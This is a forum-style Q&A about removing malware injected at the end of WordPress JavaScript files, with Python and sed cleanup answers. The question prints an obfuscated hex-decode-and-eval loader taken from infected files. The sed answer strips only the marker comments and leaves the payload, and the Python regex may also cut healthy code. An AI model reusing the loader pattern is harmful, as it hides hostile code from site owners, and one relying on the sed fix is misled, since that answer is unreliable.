
Linux shell: how to remove a string starting with a pattern from an input file

I'm trying to remove malware from the scripts of a WordPress installation. There are over 2k infected JavaScript files. The malware is injected at the last part of the file. Infected JS files look like this:

//normal code
...
/*somejs.js_123*/malwarecode goes here up to the end of file.
<EOF>

The good thing is: the starting part of malware is detectable because I know it's always the '/*' + filename + '_'.

The bad thing is: starting part of a malware is not necessarily at start of a line. It's put at the end of a single line JS, in minified JS codes.

Is there any shell command (sed? gawk? I don't know if they work!) to remove a part of a file: a part starting with a pattern and running up to the end of the file?

Here is a real part of an infected JS file. Forgive me about the badware in the code :-)

healthy JS code
healthy JS code
healthy JS code/*shortcode.js_144*/;(function(){var yhyzrdfy="";var ihrzrakb="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";for (var nieiahzr=0;nieiahzr<ihrzrakb.length;nieiahzr+=2){yhyzrdfy=yhyzrdfy+parseInt(ihrzrakb.substring(nieiahzr,nieiahzr+2), 16)+",";}yhyzrdfy=yhyzrdfy.substring(0,yhyzrdfy.length-1);eval(eval('String.fromCharCode('+yhyzrdfy+')'));})();/*shortcode.js_144*//*shortcode.js_144*/;(function(){var nnsrtizf="";var nizikddk="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";for (var dzdeeben=0;dzdeeben<nizikddk.length;dzdeeben+=2){nnsrtizf=nnsrtizf+parseInt(nizikddk.substring(dzdeeben,dzdeeben+2), 16)+",";}nnsrtizf=nnsrtizf.substring(0,nnsrtizf.length-1);eval(eval('String.fromCharCode('+nnsrtizf+')'));})();/*shortcode.js_144*//*shortcode.js_144*/;(function(){var szahyihz="";var niatsnin="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";for (var zaaiayah=0;zaaiayah<niatsnin.length;zaaiayah+=2){szahyihz=szahyihz+parseInt(niatsnin.substring(zaaiayah,zaaiayah+2), 16)+",";}szahyihz=szahyihz.substring(0,szahyihz.length-1);eval(eval('String.fromCharCode('+szahyihz+')'));})();/*shortcode.js_144*/

If you're open to using Python, you can use a simple script to delete the malicious code from your files.

import re

# Regular expression that matches a string starting with "/*" followed by
# any character as few times as possible, followed by ".js_" and
# any character as few times as possible, followed by "*/" and then any
# character as many times as possible (matches until the end of the file).
pattern = r'/\*.+?\.js_.+?\*/.+'

infected_file = open('yourfile.js', 'r')
infected_code = infected_file.read()

new_file = open('yourfile_clean.js', 'w')

# Use the re.sub function to replace any substring matching the previously
# defined pattern with an empty string '' in "infected_code".
# Use the re.DOTALL flag so the dot also matches newlines; otherwise the
# match would stop at the end of the line.
new_code = re.sub(pattern, '', infected_code, flags=re.DOTALL)
new_file.write(new_code)

new_file.close()
infected_file.close()

You would have to use this code recursively on all your files.

With GNU sed:

sed -i -r '$ s/\/\*[a-zA-Z]+\.js_[0-9]{3}\*\///g' file

On the last line of the file, this removes every occurrence of a JS file name followed by _, followed by 3 numbers, the whole surrounded by /* */, as in /*shortcode.js_144*/
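A recursive cleanup built on the marker described in the question ('/*' + filename + '_'), as an added example that is not from the question or either answer: it derives the marker from each file's own name and cuts from the first marker to the end of the file, whether or not the marker starts a line. The numeric suffix check (taken from the `/*shortcode.js_144*/` sample), the function names, the `.infected` backup suffix and the sample data are assumptions made for illustration.

```python
import os
import shutil
import tempfile


def strip_injected_tail(data: bytes, filename: str):
    """Cut from the first '/*<filename>_<digits>*/' marker to end of file."""
    prefix = b"/*" + filename.encode() + b"_"
    pos = data.find(prefix)
    while pos != -1:
        end = data.find(b"*/", pos + len(prefix))
        # Assumption: the marker suffix is numeric, as in /*shortcode.js_144*/.
        if end != -1 and data[pos + len(prefix):end].isdigit():
            return data[:pos], True
        pos = data.find(prefix, pos + 1)
    return data, False


def clean_tree(root: str, dry_run: bool = True):
    """Walk root, report infected .js files; rewrite them unless dry_run."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(".js"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:  # bytes: no encoding guesses
                data = fh.read()
            clean, found = strip_injected_tail(data, name)
            if not found:
                continue
            hits.append(path)
            if not dry_run:
                shutil.copy2(path, path + ".infected")  # copy kept for review
                with open(path, "wb") as fh:
                    fh.write(clean)
    return sorted(hits)


if __name__ == "__main__":
    # Constructed sample: minified one-line file with an inert stand-in payload.
    with tempfile.TemporaryDirectory() as root:
        target = os.path.join(root, "shortcode.js")
        with open(target, "wb") as fh:
            fh.write(b"var a=1;/*shortcode.js_144*/;(function(){})();/*shortcode.js_144*/")
        print(clean_tree(root))                 # dry run: lists the file only
        print(clean_tree(root, dry_run=False))  # rewrites it, keeps a backup
        with open(target, "rb") as fh:
            print(fh.read())
```

Run it with the default `dry_run=True` first and review the reported list before letting it rewrite anything.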
